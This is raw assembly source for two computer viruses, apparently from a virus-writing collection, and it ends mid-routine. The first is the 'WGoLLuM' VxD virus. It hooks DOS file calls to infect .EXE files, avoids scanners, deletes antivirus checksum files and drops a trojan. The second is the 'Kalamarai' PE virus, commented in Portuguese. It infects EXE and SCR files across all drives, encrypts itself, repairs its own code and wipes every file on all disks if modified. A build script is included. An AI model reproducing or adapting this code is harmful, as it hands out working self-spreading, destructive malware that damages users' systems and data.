;This is the virus startup code (Sys_Critical_Init) ; BeginProc WGoLLuM_Sys_Critical_Init ;Get path of WIN386.EXE VMMCall Get_Exec_Path ;Copy path to our buffer mov esi,edx mov edi,OFFSET32 VxD_File_Name cld rep movsb mov esi,OFFSET32 Gollum_Name mov ecx,0Bh cld rep movsb ;Return, Sys_Critical_Init complete clc ret EndProc WGoLLuM_Sys_Critical_Init ;This is the virus startup code (Device_Init) ; BeginProc WGoLLuM_Device_Init ;Hook int 21h so we can monitor dos file operations mov eax,21h mov esi,OFFSET32 VxD_Int_21h VMMcall Hook_V86_Int_Chain clc ret EndProc WGoLLuM_Device_Init ;This is the virus startup code (Init_Complete) ; BeginProc WGoLLuM_Init_Complete ;Check current date mov ah,04h VxDint 1Ah cmp dx,0604h jne short Not_Yet ;Display instalation msg VMMCall Get_SYS_VM_Handle xor eax,eax mov ecx,OFFSET32 VxD_Installation_Msg

mov edi,OFFSET32 VxD_Installation_Title VxDcall Shell_SYSMODAL_Message Not_Yet: ;Return, Sys_Critical_Init complete clc ret EndProc WGoLLuM_Init_Complete VxD_ICODE_ENDS ; ;Locked code segment ; VxD_LOCKED_CODE_SEG ;This is a call-back routine to handle the messages that are sent ;to VxD's to control system operation ; BeginProc WGoLLuM_Control Control_Dispatch Sys_Critical_Init, WGoLLuM_Sys_Critical_Init Control_Dispatch Device_Init, WGoLLuM_Device_Init Control_Dispatch Init_Complete, WGoLLuM_Init_Complete clc ret EndProc WGoLLuM_Control ;This is the virus int 21h handler ; BeginProc VxD_Int_21h, High_Freq ;Save regs pushad ;Check for our own calls (avoid recursive int 21h calls) cmp dword ptr [Our_Own_Call_Flag],"BUSY" je short Exit_VxD_Int_21h ;Set flag mov dword ptr [Our_Own_Call_Flag],"BUSY" ;Get called function mov ax,word ptr [ebp.Client_AX] ;Check for Exec function calls cmp ax,4B00h je short Store_FileName ;Check for Terminate with error-code 00h function calls cmp ax,4C00h je short Infect_Stored_FileName

cmp ah,3Bh je Drop_Exe_Trojan Exit_VxD_Int_21h: ;Clear flag mov dword ptr [Our_Own_Call_Flag],"FREE" ;Restore regs popad ;Int not served yet stc ret ;Save file name for later infection ; Store_FileName: ;Save filename into our buffer movzx edx,word ptr [ebp.Client_DX] movzx eax,word ptr [ebp.Client_DS] shl eax,04h add eax,edx mov esi,eax mov edi,OFFSET32 Infect_FileName Go_Thru_Filename: cld lodsb stosb or al,al jnz Go_Thru_Filename jmp Exit_VxD_Int_21h ;Infect stored file name ; Infect_Stored_FileName: ;Check if working on C: drive mov esi,OFFSET32 Infect_FileName cmp word ptr [esi],":C" jne Infect_Error Look_End: ;Find null marker into filename cld lodsb or al,al jnz Look_End Found_Tail: ;Search begin of file name dec esi mov ecx,0080h Look_Start: std lodsb

;Do not infect files with V character in their names cmp al,"V" je Infect_Error ;Do not infect files with digit in their names cmp al,"0" jb short Check_Start cmp al,"9" jbe Infect_Error Check_Start: cmp al,"\" je short Check_Names loop Look_Start ;Begin of file name not found, tchhh... jmp Infect_Error Check_Names: inc esi inc esi ;Save pointer to file name start mov dword ptr [Start_FileName],esi cld lodsd ;Check for SCAN cmp eax,"NACS" je Infect_Error ;Check for F-PROT cmp eax,"RP-F" je Infect_Error ;Avoid THUNDERBYTE shit cmp ax,"BT" je Infect_Error ;Get file attr mov ax,4300h mov edx,OFFSET32 Infect_FileName VxDint 21h jc Infect_Error ;Save file attr mov word ptr [file_attr],cx ;Wipe out attr mov ax,4301h xor cx,cx VxDint 21h jc Infect_Error ;Open file to infect mov ax,3D02h mov edx,OFFSET32 Infect_FileName VxDint 21h jc Restore_Attr ;Get file handler mov word ptr [Victim_Handle],ax xchg bx,ax ;Get file date/time

mov ax,5700h VxDint 21h jc Infect_Close ;Save file date time mov word ptr [File_Time],cx mov word ptr [File_Date],dx ;Read file header mov ah,3Fh mov ecx,Header_Size mov edx,OFFSET32 File_Header VxDint 21h jc Restore_Date_Time ;Seek to EOF and get real file size call Seek_File_End jc Restore_Date_Time ;Do not infect too small files cmp eax,DOS_Virus_Size+VxD_Size jbe Restore_Date_Time Test_EXE_File: ;Point esi to file header mov esi,OFFSET32 File_Header ;Check dos .EXE file type mark cmp word ptr [esi],"ZM" jne Restore_Date_Time ;Check if file is infected cmp word ptr [esi+12h],"CR" je Restore_Date_Time ;Don't infect Windows files or above cmp word ptr [esi+19h],0040h jae Restore_Date_Time ;Don't infect overlays cmp word ptr [esi+1Ah],0000h jne Restore_Date_Time ;Check maxmem field cmp word ptr [esi+0Ch],0FFFFh jne Restore_Date_Time ;Save entry point push eax mov eax,dword ptr [esi+14h] ;Crypt it! not eax mov dword ptr [DOS_Virus_Code+0177h],eax pop eax ;Make a copy of .exe file header push esi mov edi,OFFSET32 Header_Copy mov ecx,Header_Size Copy_Loop: cld lodsb not al

stosb loop Copy_Loop pop esi ;Get file size into dx:ax mov eax,dword ptr [File_Size] mov edx,eax shr edx,10h ;Get file size div 10h mov cx,0010h div cx ;Sub header size sub ax,word ptr [esi+08h] ;New entry point at EOF mov word ptr [esi+14h],dx mov word ptr [esi+16h],ax ;Save delta offset mov word ptr [DOS_Virus_Code+0001h],dx ;Set new offset of stack segment in load module inc ax mov word ptr [esi+0Eh],ax ;Set new stack pointer beyond end of virus add dx,DOS_Virus_Size+VxD_Size+0200h ;Aligment and dx,0FFFEh mov word ptr [esi+10h],dx ;Get file size into dx:ax mov eax,dword ptr [File_Size] mov edx,eax shr edx,10h ;Get file size div 0200h mov cx,0200h div cx or dx,dx jz short Size_Round_1 inc ax Size_Round_1: ;Check if file size is as header says cmp ax,word ptr [esi+04h] jne Restore_Date_Time cmp dx,word ptr [esi+02h] jne Restore_Date_Time ;Get file size into dx:ax mov eax,dword ptr [File_Size] mov edx,eax shr edx,10h ;Add virus size to file size add ax,DOS_Virus_Size+VxD_Size adc dx,0000h ;Get infected file size div 0200h mov cx,0200h div cx

or dx,dx jz short Size_Round_2 inc ax Size_Round_2: ;Store new size mov word ptr [esi+02h],dx mov word ptr [esi+04h],ax ;Write DOS virus area next to EOF mov ah,40h mov ecx,DOS_Virus_Size mov edx,OFFSET32 DOS_Virus_Code VxDint 21h jc Restore_Date_Time ;Open Gollum VxD file mov ax,3D00h mov edx,OFFSET32 VxD_File_Name VxDint 21h jc Restore_Date_Time ;Save file handler mov word ptr [Gollum_Handle],ax Read_VxD_Block: ;Read VxD file block mov ah,3Fh mov bx,word ptr [Gollum_Handle] mov ecx,0200h mov edx,OFFSET32 VxD_Buffer VxDint 21h push eax ;Encrypt block mov esi,edx mov edi,edx mov cx,0200h Crypt_Loop_3: cld lodsb not al stosb loop Crypt_Loop_3 ;Write block pop ecx mov ah,40h mov bx,word ptr [Victim_Handle] VxDint 21h cmp cx,0200h je Read_VxD_Block ;Close file mov bx,word ptr [Gollum_Handle] mov ah,3Eh VxDint 21h ;Seek to beginning of file mov bx,word ptr [Victim_Handle]

call Seek_File_Start ;Mark file as infected mov esi,OFFSET32 File_Header mov word ptr [esi+12h],"CR" ;Write new header mov ah,40h mov cx,Header_Size mov edx,esi VxDint 21h ;Delete ANTI-VIR.DAT mov esi,OFFSET32 CheckSum_File_00 call Delete_File ;Delete CHKLIST.TAV mov esi,OFFSET32 CheckSum_File_01 call Delete_File ;Delete CHKLIST.MS mov esi,OFFSET32 CheckSum_File_02 call Delete_File ;Delete AVP.CRC mov esi,OFFSET32 CheckSum_File_03 call Delete_File ;Delete IVB.NTZ mov esi,OFFSET32 CheckSum_File_04 call Delete_File Restore_Date_Time: mov ax,5701h mov cx,word ptr [File_Time] mov dx,word ptr [File_Date] VxDint 21h Infect_Close: ;Close file mov ah,3Eh VxDint 21h Restore_Attr: ;Restore file attr mov ax,4301h mov cx,word ptr [File_Attr] mov edx,OFFSET32 Infect_FileName VxDint 21h Infect_Error: jmp Exit_VxD_Int_21h ;Drop a trojan .EXE file (sometimes) ; Drop_Exe_Trojan: ;This is our dice in ax,40h cmp al,0FFh jne Bad_OverWrite ;Open Gollum VxD file mov ax,3D00h

mov edx,OFFSET32 VxD_File_Name VxDint 21h jc Bad_OverWrite ;Save file handler mov word ptr [Gollum_Handle],ax ;Create file, abort if exist mov ah,5Bh xor cx,cx mov edx,OFFSET32 Trojan_File_Name VxDint 21h jc short Bad_OverOpen ;Save file handler mov word ptr [Victim_Handle],ax Trojanize_Block: ;Read VxD file block mov ah,3Fh mov bx,word ptr [Gollum_Handle] mov ecx,0200h mov edx,OFFSET32 VxD_Buffer VxDint 21h ;Write block xchg ecx,eax mov ah,40h mov bx,word ptr [Victim_Handle] VxDint 21h cmp cx,0200h je Trojanize_Block ;Close trojan file mov ah,3Eh VxDint 21h Bad_OverOpen: ;Close virus VxD file mov bx,word ptr [Gollum_Handle] mov ah,3Eh VxDint 21h Bad_OverWrite: jmp Exit_VxD_Int_21h ;Delete file routines ; Delete_File: mov edi,dword ptr [Start_FileName] Copy_DB_Name: cld lodsb stosb or al,al jnz Copy_DB_Name ;Wipe out file attr mov ax,4301h

xor ecx,ecx mov edx,OFFSET32 Infect_FileName VxDint 21h ;Delete filename mov ah,41h VxDint 21h ret ;Move file pointer routines (bx = file handle) ; Seek_File_Start: xor al,al jmp SHORT Seek_Int_21h Seek_File_End: mov al,02h Seek_Int_21h: mov ah,42h xor cx,cx xor dx,dx VxDint 21h jc short Seek_Error ;Return file pointer position into eax and eax,0000FFFFh shl edx,10h add eax,edx mov dword ptr [File_Size],eax clc ret Seek_Error: stc ret EndProc VxD_Int_21h VxD_LOCKED_CODE_ENDS END ; - -[ASSEMBLE.BAT - Batch file used to build GOLLUM.INC] - - - - - - - ->8 tasm gollum tlink /Tde gollum exe2bin gollum.exe gollum.bin crypt data gollum.crp gollum.inc

;Kalamarai virus - Um caso cl ssico de personalidade dupla ;) ;Este virus pode corrigir at 90 bytes linearmente modificados a cada ciclo, ;usando uma rotina de ECC Reed-Solomon, portanto, tentativas de modificar o ;codigo residente so futeis, e perigosas, pois se o virus no consegue ;corrigir todas as modifica es(mais de 90 bytes), deleta todos os arquivos ;de todos os discos. O virus encriptado usando MUL/DIV, obtem as APIs ;diretamente da ImportTable do hospedeiro, e cria uma thread paralela para se ;executar. O virus busca recursivamente todos os discos por arquivos PE de ;extenso EXE e SCR. ;Aten o: No modifique! O cdigo sempre deve ser multiplo de 249! .386p .model flat RELOCS EQU 094h ofs by wo dwo equ offset equ byte ptr equ word ptr equ dword ptr

.xlist include pe.inc include mz.inc include win32api.inc include useful.inc .list .data v_ini: mov esi, ? vofs equ dwo $-4 add esi, [esp+4] ;par metro da thread=reloc mov edi, esi mov ecx, (ofs v_fim-ofs entrada)/4 mov ebx, ? chave equ dwo $-4 desencripta: sub edx, edx lodsd mul ebx add eax, [esi] stosd ;dword1*key+dword2 lodsd loop desencripta entrada: cld ;entrada da primeira gera o call delta

delta: pop ebp lea esi, [ebp+(ofs reloctable-ofs delta)] mov edi, ebp sub edi, (ofs delta-ofs v_ini) ;edi=inicio do virus sub ebp, ofs delta mov ecx, ? ;ebp=diferen a do offset original numeroreloc equ $-4 arruma: sub eax, eax lodsw not ax ;encripta o leve add [edi+eax], ebp ;arruma ponteiro loop arruma mov eax, ? GMHA equ dwo $-4 ;ponteiro para a ImportTable add eax, [esp+4] push ofs kernel32 call [eax] mov ebp, eax ;ebp=kernel32 module handle mov ebx, ? GPA equ dwo $-4 ;ponteiro para a ImportTable add ebx, [esp+4] mov esi, ofs kernel32API mov edi, ofs CreateThread_ proximaAPI: cmp by [esi], 0 ;todas as APIs obtidas? je feito push esi push ebp call [ebx] ;pega endere o stosd @endsz ;busca inicio da proxima API jmp proximaAPI feito: call dwo [GetTickCount] xor [chave], eax ;escolhe chave de encripta o or dwo [chave], 00000000001000001010101000000001b and dwo [chave], 00000000001111111111111111111111b push eax push ofs corrige ;rotina para evitar modifica es call cria_thread mov eax, [thread_id] mov [thread_corrige], eax di_novo: push ofs infecta_pe ;rotina para chamar a cada arquivo push ofs busca_recursiva call cria_thread push 60*60*1000 call dwo [Sleep2] ;dorme por 1 hora jmp di_novo

cria_tabela: call calcula_crc mov [crc32], eax mov ebp, [tabela] sub ecx, ecx constroi: call constroi_bloco imul eax, ecx, 6 lea edi, [ebp+eax] movsd movsw inc cl cmp cl, BLOCOS jne constroi ret

;salva not(crc32) do virus

;ecx=par metro ;esi=6 bytes de CCE ;posi o no buffer ;salva codigo para este bloco ;proximo bloco

fode_tudo: pushad sub esi, esi mov ebp, [esp+(8*4)+4] push FILE_ATTRIBUTE_NORMAL push ebp call dwo [SetFileAttributesA] ;remove atributos do arquivo test eax, eax jz deleta_igual push esi push FILE_ATTRIBUTE_NORMAL push TRUNCATE_EXISTING push esi push esi push GENERIC_WRITE push ebp call dwo [CreateFileA] ;sobreescreve arquivo inc eax jz deleta_igual dec eax push eax ;argumento para fechar push esi push ofs temp push ofs fim_mensagem-ofs mensagem push ofs mensagem push eax ;escreve nossa mensagem call dwo [WriteFile] call dwo [CloseHandle] ;fecha arquivo deleta_igual: push ebp call dwo [DeleteFileA] ;detona arquivo nao_e: popad ret 4

mensagem db "never touch the kala-marai!", 0 fim_mensagem equ $ infecta_pe: pushad mov esi, [esp+(8*4)+4] push esi call dwo [lstrlen] mov eax, dwo [esi+eax-4] and eax, not 20202000h cmp eax, "EXE." je detona cmp eax, "RCS." jne nao_e detona: push esi call infecta_arquivo jmp nao_e para_correcao: pushad segura: mov ecx, [espera] jecxz segura push dwo [thread_corrige] call dwo [SuspendThread] mov ecx, [esp+(8*4)] cmp by [ecx], 0cch je mexeu_pagou volta: popad ret

;extenso valida pra infe o?

;manda bala!

;no podemos mexer em nada...

;segura thread que corrige

;breakpoint esperando?

segue_correcao: pushad call cria_tabela push dwo [thread_corrige] ;continua thread de corre o call dwo [ResumeThread] jmp volta ;temos que economizar bytes... corrige: pushad mov dwo [espera], 1 BLOCOS = (ofs final_virus-ofs v_ini)/249 push PAGE_READWRITE push MEM_RESERVE+MEM_COMMIT push (BLOCOS*6)+249+256 push 0 call dwo [VirtualAlloc] mov [tabela], eax

test eax, eax ;no h memoria suficiente... jz deu_merda call cria_tabela ;cria corre o e crc32 verifica_virus: call calcula_crc xor eax, [crc32] jz verifica_virus ;virus foi modificado? dec dwo [espera] ;corrigindo virus, p ra tudo sub ecx, ecx proximo_bloco: call constroi_bloco ;esi=6 bytes de CCE imul eax, ecx, 6 lea edi, [ebp+eax] ;posi o no buffer cmpsd lahf cmpsw ;compara codigo para este bloco jne e_este sahf e_este: je bloco_ok ;bloco foi modificado? sub esi, 6 mov eax, [edi-6] mov [esi], eax mov ax, [edi-2] mov [esi+4], ax lea edi, [ebp+(BLOCOS*6)] ;edi=buffer temporario push ecx push ofs temp push edi push esi call _rsdecode ;corrige add esp, 3*4 pop ecx cmp dwo [temp], 3 ja mexeu_pagou ;corrigiu todos os erros? sub edx, edx corrige_byte: imul eax, edx, BLOCOS mov bl, [edi+edx] mov [eax+ecx+ofs v_ini], bl ;corrige byte inc dl cmp dl, 250 jne corrige_byte bloco_ok: inc cl cmp cl, BLOCOS ;proximo bloco jne proximo_bloco inc dwo [espera] ;tudo volta ao normal... jmp verifica_virus mexeu_pagou: push ofs fode_tudo

push ofs busca_recursiva call cria_thread push MEM_RELEASE push 0 push ebp call dwo [VirtualFree] deu_merda: popad ret 4

;ativa o virus!

;libera memoria

busca_recursiva: ;par metro=rotina de arquivo pushad sub esp, 4 mov ebp, esp mov [ebp], "\:@" ;inicia busca por A:\ proximo_disco: cmp by [ebp], "Z" je tudo ;se j tamos no Z:\, para inc by [ebp] push ebp call dwo [GetDriveTypeA] cmp al, 3 ; disco rigido? je fixo cmp al, 4 ;ou disco de rede? jne proximo_disco fixo: push ebp call dwo [SetCurrentDirectoryA] test eax, eax jz proximo_disco push dwo [esp+(8*4)+8] ;rotina CALLBACK call busca_disco ;busca dentro dos diretrios jmp proximo_disco tudo: add esp, 4 ;todos os discos processados jmp deu_merda busca_disco: pushad sub esp, SIZEOF_WIN32_FIND_DATA+4+4+4 mov ebp, esp mov dwo [ebp.SIZEOF_WIN32_FIND_DATA], "*.*" ;constroi m scara de busca mov dwo [ebp.SIZEOF_WIN32_FIND_DATA+4+4], ".." ;e para mudar de diretrio lea eax, [ebp.SIZEOF_WIN32_FIND_DATA] push ebp push eax call dwo [FindFirstFileA] mov dwo [ebp.SIZEOF_WIN32_FIND_DATA+4], eax ;salva handle da busca inc eax jz sobe_dir verifica_dir:

lea eax, [ebp.WFD_szFileName] test dwo [ebp.WFD_dwFileAttributes], 10h jnz e_dir push eax mov eax, [esp+(8*4)+(SIZEOF_WIN32_FIND_DATA+4+4+4)+8] call eax ;chama CALLBACK continua_busca: push ebp push dwo [ebp.SIZEOF_WIN32_FIND_DATA+4] call dwo [FindNextFileA] ;procura proximo arquivo test eax, eax jnz verifica_dir sobe_dir: push dwo [ebp.SIZEOF_WIN32_FIND_DATA+4] call dwo [FindClose] lea eax, [ebp.SIZEOF_WIN32_FIND_DATA+4+4] ;ponteiro para ".." push eax call dwo [SetCurrentDirectoryA] add esp, SIZEOF_WIN32_FIND_DATA+4+4+4 jmp deu_merda e_dir: cmp by [eax], '.' je continua_busca ;evita travar push eax call dwo [SetCurrentDirectoryA] ;entra no diretrio test eax, eax jz continua_busca push dwo [esp+(8*4)+(SIZEOF_WIN32_FIND_DATA+4+4+4)+4] call busca_disco ;busca recursiva jmp continua_busca cria_thread: push ofs temp push 4 ;CREATE_SUSPENDED push dwo [esp+(2*4)+8] ;par metro push dwo [esp+(3*4)+4] ;rotina push 0 push 0 call dwo [CreateThread_] xchg ecx, eax jecxz deu_pau mov [thread_id], ecx push ecx push -15 ;THREAD_PRIORITY_IDLE push ecx call dwo [SetThreadPriority] call dwo [ResumeThread] deu_pau: ret 4*2 .xlist

include ECC\rslib.asm include ECC\gflib.asm .list calcula_crc: mov edx, ofs v_ini mov ecx, ofs crc32-ofs v_ini push not 0 pop eax @@1: xor al, [edx] ;rotina de zhengxi inc edx mov bl, 8 @@2: shr eax, 1 jnc @@3 xor eax, 0EDB88320h ;polinomio @@3: dec bl jnz @@2 loop @@1 @@4: ;devolve not(crc32) ret loader: pushad sub eax, 12345678h entrypoint equ dwo $-4 ;eax!=0 se arquivo foi relocado mov ebx, ? host_createthread equ dwo $-4 ;endere o de CreateThread na ImportTable mov ecx, ? ;entrada do desencriptador virus_pointer equ dwo $-4 add ebx, eax add ecx, eax push esp push esp push 0 push eax push ecx push 0 push 0 call [ebx] ;chama CreateThread pop eax popad db 0e9h ;continua execu o no host endereco_host dd 0 fim_loader equ $ constroi_bloco: push ecx sub edx, edx

;salva contador de blocos

lea edi, [ebp+(BLOCOS*6)] ;edi=buffer temporario proximo_byte: imul eax, edx, BLOCOS mov al, [eax+ecx+ofs v_ini] stosb inc dl cmp dl, 250 jne proximo_byte ;constroi bloco de 249 bytes mov esi, edi sub edi, 250 push esi push edi call _rsencode ;calcula cdigo de corre o de erro add esp, 4*2 pop ecx ret LOCAL_DATA EQU SIZE IMAGE_NT_HEADERS+4+(8*3)+(IMAGE_SIZEOF_SECTION_HEADER*10) infecta_arquivo: pushad sub esp, LOCAL_DATA mov ebp, esp push dwo [esp+(8*4)+4+LOCAL_DATA] call dwo [GetFileAttributesA] mov [ebp+SIZE IMAGE_NT_HEADERS], eax ;salva atributos do arquivo inc eax jz puta_merda push FILE_ATTRIBUTE_NORMAL push dwo [esp+(8*4)+4+LOCAL_DATA+4] call dwo [SetFileAttributesA] ;limpa atributos test eax, eax jz puta_merda push dwo [esp+(8*4)+4+LOCAL_DATA] call verifica inc eax jz ja_infectado push ebx ;par metro para CloseHandle lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4] push esi lodsd lodsd ;esi+=8 push esi lodsd lodsd ;esi+=8 push esi push ebx call dwo [GetFileTime] ;salva FILETIME sub esi, esi mov dwo [infectou?], esi test eax, eax

jz puta_que_pariu push esi push ofs temp push SIZE IMAGE_NT_HEADERS push ebp push ebx call dwo [ReadFile] ;l PE header test eax, eax jz fudeu xor [temp], SIZE IMAGE_NT_HEADERS jnz fudeu cmp [ebp.NT_Signature], IMAGE_NT_SIGNATURE jne fudeu ; PE de veras? mov ecx, dwo [ebp.NT_FileHeader.FH_Machine] cmp cx, IMAGE_FILE_MACHINE_I386 jne fudeu ;roda em Intel 386+ shr ecx, 16 cmp cl, 9 ;arquivo tem se es demais... jae fudeu mov ax, [ebp.NT_FileHeader.FH_Characteristics] not al test ax, IMAGE_FILE_EXECUTABLE_IMAGE+IMAGE_FILE_DLL jnz fudeu ;no DLL mas executavel mov eax, ecx shl eax, 5 ;eax*=32 shl ecx, 3 ;ecx*=8 add ecx, eax ;ecx=eax*40 mov [tsecao], ecx ;salva tamanho das SectionHeaders lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4+(8*3)] push 0 push ofs temp push ecx push esi push ebx call dwo [ReadFile] ;l SectionHeaders mov eax, [esi.SH_PointerToRawData] sub eax, [pe_ptr] sub eax, [tsecao] cmp eax, IMAGE_SIZEOF_SECTION_HEADER+SIZE IMAGE_NT_HEADERS jb fudeu ;no tem espa o pra nova se o mov eax, [ebp.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_Size] test eax, eax jz fudeu ;no tem ImportTable? mov edi, [ebp.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress] add edi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR proxima_dll: add edi, IMAGE_SIZEOF_IMPORT_DESCRIPTOR lea esi, [edi.ID_Name] call le4 ;l ponteiro pro nome da DLL jc fudeu mov esi, eax

call le8 ;pega 8 bytes do nome jc fudeu and eax, not 20202020h and ecx, not 00002020h ;passa nome da dll pra maiusculas xor eax, "NREK" jnz proxima_dll xor ecx, "23LE" ;verifica se a malvada jnz proxima_dll mov esi, edi ;[edi.ID_Characteristics] call le4 jc fudeu push eax lea esi, [edi.ID_FirstThunk] call le4 pop esi ;esi=lista de nomes test eax, eax jz fudeu mov edi, eax test esi, esi ;existe uma HintTable? jnz nomes_separados mov esi, edi ;no, tudo o mesmo nomes_separados: add edi, [ebp.NT_OptionalHeader.OH_ImageBase] ;edi=ponteiros no EXE call para_correcao sub eax, eax mov [GMHA], eax mov [GPA], eax ;limpa endere os mov [host_createthread], eax le_nome: call le4 jc ve_se_deu test eax, eax ;j foram todas as APIs? jz ve_se_deu push esi lea esi, [eax+2] ;pula ordinal order call le8 jc le_proxima cmp eax, "MteG" ;verifica se GetModuleHandleA jne ve_gpa cmp ecx, "ludo" jne le_proxima ;GetModul????dleA add esi, 8 call le8 jc le_proxima cmp ecx, "Aeld" jne le_proxima mov [GMHA], edi jmp le_proxima ve_gpa: cmp eax, "PteG" ;verifica se GetProcAddress jne ve_ct

cmp ecx, "Acor" jne le_proxima ;GetProcA???? mov [GPA], edi jmp le_proxima ve_ct: cmp eax, "aerC" ;verifica CreateThread jne le_proxima cmp ecx, "hTet" jne le_proxima add esi, 8 call le4 jc le_proxima cmp eax, "daer" jne le_proxima mov [host_createthread], edi jmp le_proxima le_proxima: pop esi add esi, 4 ;verifica proxima API do host add edi, 4 jmp le_nome ve_se_deu: sub eax, eax cmp [GMHA], eax jz fudeu cmp [GPA], eax ;todas 3 APIs foram obtidas? jz fudeu cmp [host_createthread], eax jz fudeu inc wo [ebp.NT_FileHeader.FH_NumberOfSections] lea esi, [ebp+(SIZE IMAGE_NT_HEADERS+4+(8*3))-IMAGE_SIZEOF_SECTION_HEADER] mov ecx, (ofs fim_loader-ofs loader) mov eax, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_SizeOfRawData] mov edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize] sub eax, edx jbe fudeu cmp eax, ecx jbe fudeu ;pouco espa o de "slack" push edx ;edx=tamanho da primeira se o add edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_PointerToRawData] mov [lugarloader], edx pop edx add [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize], ecx ;aumenta pro loader add edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] mov eax, [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint] test eax, eax ;entrypoint=0 jz fudeu mov [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint], edx sub eax, edx ;calcula salto relativo sub eax, (ofs fim_loader-ofs loader) add edx, [ebp.NT_OptionalHeader.OH_ImageBase]

mov [entrypoint], edx mov [endereco_host], eax call segue_correcao mov edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] add esi, [tsecao] add [tsecao], IMAGE_SIZEOF_SECTION_HEADER lea edi, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_Name] mov eax, [chave] push eax and eax, 0f0f0f0fh add eax, "AAAA" stosd pop eax ror eax, 17 and eax, 0f0f0f0fh ;inicia cria o da nova se o add eax, "AAAA" stosd mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_Characteristics], IMAGE_SCN_MEM_WRITE + \ IMAGE_SCN_MEM_READ + IMAGE_SCN_CNT_INITIALIZED_DATA mov eax, [esi.SH_SizeOfRawData] add eax, [esi.SH_PointerToRawData] call alinha_file mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_PointerToRawData], eax mov [escreve], eax ;onde vamos escrever o virus mov eax, [esi.SH_VirtualSize] add eax, [esi.SH_VirtualAddress] call alinha_mem mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress], eax add eax, [ebp.NT_OptionalHeader.OH_ImageBase] call para_correcao mov [virus_pointer], eax add eax, ofs entrada-ofs v_ini mov [vofs], eax ;onde vai estar o codigo encriptado call segue_correcao mov eax, (ofs v_fim-ofs v_ini)*2 push eax call alinha_file mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_SizeOfRawData], eax add eax, [escreve] mov [tamanho_total], eax ;tamanho final do arquivo pop eax call alinha_mem mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize], eax add eax, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] add eax, edx call alinha_mem cmp [ebp.NT_OptionalHeader.OH_SizeOfImage], eax jae ja_ta ;arquivo j grande suficiente? mov [ebp.NT_OptionalHeader.OH_SizeOfImage], eax ja_ta: mov [ebp.NT_OptionalHeader.OH_CheckSum], 0

; ;

inc dwo [infectou?] mov eax, [pe_ptr] sub eax, 4 push 0 push 0 push eax push ebx ;vai at PE header-4 call dwo [SetFilePointer] push 0 push ofs temp push 4 push ofs marca push ebx ;escreve marca de infe o call dwo [WriteFile] push 0 push ofs temp push SIZE IMAGE_NT_HEADERS push ebp push ebx ;escreve pe header modificado call dwo [WriteFile] lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4+(8*3)] push 0 push ofs temp push [tsecao] push esi push ebx ;escreve SectionHeaders call dwo [WriteFile] push 0 push 0 push [lugarloader] push ebx ;vai pro final da 1 se o call dwo [SetFilePointer] push 0 push ofs temp push (ofs fim_loader-ofs loader) push ofs loader push ebx ;escreve o loader call dwo [WriteFile] push PAGE_READWRITE push MEM_RESERVE+MEM_COMMIT push (ofs v_fim-ofs v_ini)*4 ;pega memoria pra encriptar virus push 0 call dwo [VirtualAlloc] test eax, eax ;se falhar, fudeu pra valer! jz $ push MEM_RELEASE push 0 push eax ;par metros pra liberar memoria mov edi, eax mov esi, ofs v_ini mov ecx, (ofs entrada-ofs v_ini)

rep movsb ;copia desencriptador push ebx ;salva handle do arquivo mov ecx, (ofs v_fim-ofs entrada)/4 mov ebx, [chave] encripta: sub edx, edx lodsd div ebx stosd ;guarda quociente mov eax, edx stosd ;guarda resto loop encripta pop ebx push 0 push 0 push [escreve] push ebx ;vai pra nossa se o call dwo [SetFilePointer] push 0 push ofs temp push ((ofs v_fim-ofs entrada)*2+(ofs entrada-ofs v_ini)) push dwo [esp+(3*4)] push ebx ;escreve o virus call dwo [WriteFile] call dwo [VirtualFree] ;libera memoria push 0 push 0 push [tamanho_total] push ebx ;vai at novo final call dwo [SetFilePointer] push ebx ;marca final do arquivo call dwo [SetEndOfFile] fudeu: lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4] push esi lodsd xor [rnd], eax lodsd push esi ;esi+=8 lodsd lodsd xor [rnd], eax push esi ;esi+=8 push ebx call dwo [SetFileTime] ;restaura FILETIME puta_que_pariu: call dwo [CloseHandle] mov ecx, [infectou?] jecxz ja_infectado push 20*1000 call dwo [Sleep2] ;se infectou, descansa um pouco

ja_infectado: push dwo [ebp+SIZE IMAGE_NT_HEADERS] push dwo [esp+(8*4)+4+LOCAL_DATA+4] call dwo [SetFileAttributesA] ;restaura atributos puta_merda: add esp, LOCAL_DATA popad ret 4 le4: push 0 push esp push esi push 4 call le_rva pop eax ret le8: push 0 push 0 push esp push esi push 8 call le_rva pop eax pop ecx ret ;buffer ;rva para ler ;tamanho da leitura

;buffer ;rva para ler ;tamanho da leitura

le_rva: pushad lea esi, [ebp+(SIZE IMAGE_NT_HEADERS+4+(8*3))] movzx ecx, wo [ebp.NT_FileHeader.FH_NumberOfSections] proximo_header: mov eax, [esp+(8*4)+8] sub eax, [esi.SH_VirtualAddress] ;tira base da se o do rva jc caralho cmp eax, [esi.SH_VirtualSize] ;aponta dentro? jb converte caralho: add esi, IMAGE_SIZEOF_SECTION_HEADER loop proximo_header erro: stc pula_stc: popad ret 3*4 converte: add eax, [esi.SH_PointerToRawData] ;some inicio da se o push 0 push 0

